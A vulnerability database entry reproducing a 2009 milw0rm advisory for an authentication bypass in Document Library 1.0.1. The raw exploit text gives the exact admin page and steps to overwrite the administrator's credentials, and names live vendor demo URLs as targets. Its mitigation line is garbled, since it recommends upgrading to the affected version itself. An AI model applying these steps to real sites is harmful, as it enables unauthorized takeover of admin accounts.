Document Library Version 1.0.1 Update Admin Account Info

vendor:

Document Library

by:

ByALBAYX

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Document Library

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:digitalinterchange:document_library

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Document Library Version 1.0.1 Update Admin Account Info

Document Library Version 1.0.1 is vulnerable to authentication bypass. An attacker can exploit this vulnerability by accessing the save_user.asp page and setting the admin username and password to the same value. This will allow the attacker to bypass authentication and gain access to the admin panel.

Mitigation:

Upgrade to the latest version of Document Library Version 1.0.1

Source

Exploit-DB raw data:

@~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@
@~~=Author   : ByALBAYX

@~~=Website  : WWW.C4TEAM.ORG

@~~=Contry   : Turkish
@~~=======================================~~@
@~~=Script   :Document Library Version 1.0.1

@~~=S.Site   :http://digitalinterchange.com

@~~=Dty      :http://digitalinterchange.com/products/index.asp?iProductID=12

@~~=Demo     :http://library.digitalinterchange.com

@~~=Price    :$109.00
@~~=======================================~~@

@~~=Vul:


@~~=Update Admin Account Info


@~~=http://c4team.org/ [PATH] /admin/save_user.asp


@~~=Admin Username   :Heykir

@~~=Admin Password   :Heykir

@~~=Confirm Password :Heykir


@~~=Save


@~~=http://c4team.org/ [PATH] /admin/login.asp


@~~=Demo:

@~~=http://library.digitalinterchange.com/admin/save_user.asp

@~~=http://library.digitalinterchange.com/admin/login.asp

Vs....
@~~=======================================~~@
:( :( :(
@~~=======================================~~@

# milw0rm.com [2009-03-02]